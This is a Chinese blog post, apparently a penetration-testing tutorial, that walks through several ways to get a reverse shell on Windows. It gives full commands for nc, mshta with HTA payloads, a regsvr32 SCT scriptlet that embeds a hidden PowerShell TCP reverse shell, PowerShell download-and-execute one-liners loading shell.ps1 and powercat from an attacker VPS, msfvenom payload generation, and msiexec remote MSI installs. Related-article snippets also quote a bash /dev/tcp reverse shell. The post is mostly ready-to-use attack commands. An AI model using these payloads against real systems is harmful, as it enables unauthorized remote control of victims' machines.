Windows反弹Shell

最新推荐文章于 2024-05-12 08:11:43 发布
最新推荐文章于 2024-05-12 08:11:43 发布
阅读量731 收藏 19
点赞数 18
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62073002/article/details/138182409
版权

1.简介

正向shell:         控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。

反向shell(反弹shell)︰  被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。

靶机:win11

攻击机:vps

2.方法

(1) nc     

确保靶机已经有netcat;

攻击机开启监听:nc -lvvp 9090

靶机端运行: nc.exe  攻击机IP 9090 -e cmd.exe

若想反弹  powershell.exe

靶机端运行: nc.exe  攻击机IP 9090 -e powershell.exe

        

上线成功。

(2)mshta

Mshta.exe是用于负责解释运行 HTA(HTML应用程序)文件的windows oS实用程序。可以运行JavaScript或VBScript的HTML文件。


生成hta后门。

VPS  安装  Metasploit渗透框架

curl https://gitee.com/yijingsec/metasploit-omnibus/raw/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

msfconsole  运行hta文件

攻击机运行

启动   msfconsole

search  hta_server
use 0
options
设置64位的后门
set payload windows/x64/meterpreter/reverse_tcp
set lhost vps_ip

set lport 9090
set target 1
run -j

靶机运行

mshta http://vps_ip:8080/l9URjD.hta

hta_server 是一个模块;在模块运行时候就开启监听了

9090端口用来接收;默认在8080端口提供文件上传

这种情况属于反弹shell 但不是shell 而是metaprete

现在使用hta应用进行反弹shell

vps 生成1.hta文件

msfvenom -p windows/x64/shell_reverse_tcp lhost=vps_ip lport=9090 -f hta-psh -o 1.hta

python3 -m http.server    # 将1.hta文件放在8000端口提供下载

开启9090监听
nc -lvvp 9090   用于接收反弹shell

靶机执行 

mshta http://vps_ip:8000/1.hta

hta的原理

其实本质上还是powershell hta将powershell封装在hta文件

(3)rundll32 ( dll +nc )

Rundll32.exe与Windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其存个在适当的内存库中。

通过Msfvenom生成反弹shell的dll发起Rundll32攻击
 

msfvenom生成dll执行

vps下载   impacket

git clone https://github.com/fortra/impacket.git
 

(4)regsvr32 (sct 反弹shell) 注册表服务

<?XML version="1.0"?>
<scriptlet>
<registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
    <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run('powershell -w Hidden -c "$client = New-Object System.Net.Sockets.TCPClient(\'vps_ip\',10000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"');

    ]]>
</script>
</registration>
</scriptlet>

靶机保存上面这个文件名字为 cmd.sct,注意ip 

vps nc -lvvp 10000

靶机运行

regsvr32.exe /n /s /u /i:cmd.sct scrobj.dll

还可以进行http服务的进行反弹shell

cmd.sct会要上传到vps上。

攻击机

python3 -m http.server 8080
nc -lvvp 10000
 

靶机运行

>regsvr32.exe /n /s /u /i:http://ip:8080/cmd.sct scrobj.dll

(5) powershell 直接进行反弹shell

生成power shell脚本

攻击机执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=vpsip  lport=9091 -f psh -o shell.ps1

 nc -lvvp 9091
python3 -m http.server
靶机执行

powershell.exe -c "iex(new-object system.net.webclient).downloadstring('http://vpsip:8000/shell.ps1');shell.ps1"

如果执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=vpsip  lport=9090 -f psh-reflection -o shell.ps1

shell.ps1

 nc -lvvp 9090
python3 -m http.server

靶机执行

powershell.exe -c "iex(new-object system.net.webclient).downloadstring('http://vpsip:8000/shell.ps1')"

(6)powershell 加载 powercat

Powercat是PowerShell本地后门侦听器和反向shell工具,也称为修改版本的netcat,因为它集成支持经过编码的有效载荷。
下载powercat

git clone https://gitee.com/yijingsec/powercat.git

在powercat目录下

 python3 -m http.server
nc -lvvp 9090
 

靶机执行

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://vpsip:8080/powercat.ps1');powercat -c vpsip -p 9090 -e cmd"

(7)msiexec

msfvenom -p windows/x64/shell_reverse_tcp lhost=vpsip  lport=9090 -f msi -o  9090.msi
 python3 -m http.server
nc -lvvp 9090

靶机

msiexec /q /i http://vpsip:8080/9090.msi

WANG_LEARN
关注
  • 18
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Windows的几种常用反弹shell方法
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
反弹Shell方法论,Windows
大河之犬的博客
10-10 747
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2003
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Windows 系统中常见的 Shell 命令总结(不时补充)_windows shell cmd
最新发布
2401_83977546的博客
05-12 495
针对最近很多人都在面试,我这边也整理了相当多的面试专题资料,也有其他大厂的面经。希望可以帮助到大家。下面的面试题答案都整理成文档笔记。也还整理了一些面试资料&最新2021收集的一些大厂的面试真题(都整理成文档,小部分截图)最新整理电子书本文已被CODING开源项目:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】收录需要这份系统化的资料的朋友,可以点击这里获取五、显示目录和文件六、进入目录七、删除文件八、删除目录并同时删除目录中的子目录以及文件8.1、del 的其他命令说明。
渗透测试-window反弹shell
lza20001103的博客
05-11 4251
window反弹shell
Windows 反弹 Shell
weixin_30414245的博客
08-03 534
NC 反弹 shell 攻击场景:   Victim IP: 192.168.2.10   Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cm...
Windows 反弹shell方法
weixin_53747497的博客
07-12 2652
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
Window下的反弹shell
qq_58000413的博客
05-05 1151
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
Windows反弹shell测试
oscarli的博客
05-30 300
windows反弹shell测试记录
windows 反弹shell_windows版瑞士军刀powercat之牛刀小试
weixin_39963080的博客
12-12 237
时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:powercat 正向shellwindows-linux)powercat 反向shellwindows-linux)powercat 反向powershell(w...
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
cmd反弹shell提权
10-24
cmd反弹shell提权
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
go语言邮件反弹shellwindows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shellwindows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
反弹shell
A_Alger的博客
09-09 260
多种姿势反弹shell bash attacker 监听 nc -lvvp 4444 victim 运行 bash -i >& /dev/tcp//4444 0>&1 nc 支持 -e 选项 attacker 监听 nc -lvvp 4444 victim 运行 nc 4444 -t -e /bin/bash python attacker 监听 nc -...
windows反弹shell复现
热门推荐
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
利用oracle反弹SHELL 获取windows服务器权限
weixin_38023368的博客
08-08 2842
运气不错,找了一个Oracle注入的网站 网站是我自己找的。。。 监听的服务器是我自己的。。。 仅供参考 原理我还是要继续说一下的: 利用oracle  GET_DOMAIN_INDEX_TABLES函数注入漏洞  反弹SHELL 利用exec创建java包创建账号 lcx进行端口转发连接,下面详解介绍每一步 反弹SHELL GET_DOM
windows 反弹shell
07-29
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值